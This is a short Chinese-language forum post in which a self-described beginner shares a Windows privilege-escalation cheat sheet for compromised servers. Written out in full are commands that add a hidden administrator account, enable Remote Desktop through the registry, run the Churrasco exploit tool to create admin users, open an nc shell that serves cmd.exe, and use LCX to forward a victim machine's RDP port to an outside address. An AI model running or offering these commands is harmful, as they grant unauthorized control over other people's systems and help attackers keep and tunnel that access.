0x00 小菜今天學習了一些windows下的提權,分享一下,以后也方便查看,也請大牛指教
0x01 cmd基本命令(這乃安全工程師必備,如果你不知道,百度google你值得擁有)
net start telnet 開telnet服務(開啟服務 service start XX)
net user 查看所有用戶列表
net user hack123 hack123 /add 添加用戶hack123密碼為hack123
net localgroup administrators hack123 /add 將帳號hack123升級為管理員
開3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
0x02 巴西烤肉 簡單介紹一下,主要是服務器支持wscript組建,如果不支持就考慮別的方法吧,畢竟那啥,姿勢還是要對,不對換一種唄,說一下利用,先上傳一個cmd,然后上傳巴西烤肉
執行 XXX\XXX\ Churrasco.exe "net user hack123 hack123 /add && net localgroup administrators hack123 /add" (XXX是路徑)
XXX\XXX\ Churrasco.exe "net user admin$ /del" 刪除帳號
query user 查看會話
logoff ID號 踢掉
XXX\XXX\ Churrasco.exe "logoff 1"
0x03 NC反彈
路徑\nc.exe -l -p 端口 -t -e 路徑\cmd.exe
XXX\XXX\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe
NC上傳
DOS界面下運行:
NC -vv url 80<1.txt
-vv: 回顯
80: web端口
1.txt: 就是你要發送的數據包
0x04 LCX端口轉發
先本地監聽X端口 lcx.exe -listen X 3389
c:\recycler\lcx.exe -slave 自己的ip X 肉雞IP 3389 LCX轉發
c:\recycler\lcx.exe -slave 202.134.12.12 X 123.123.4.4 3389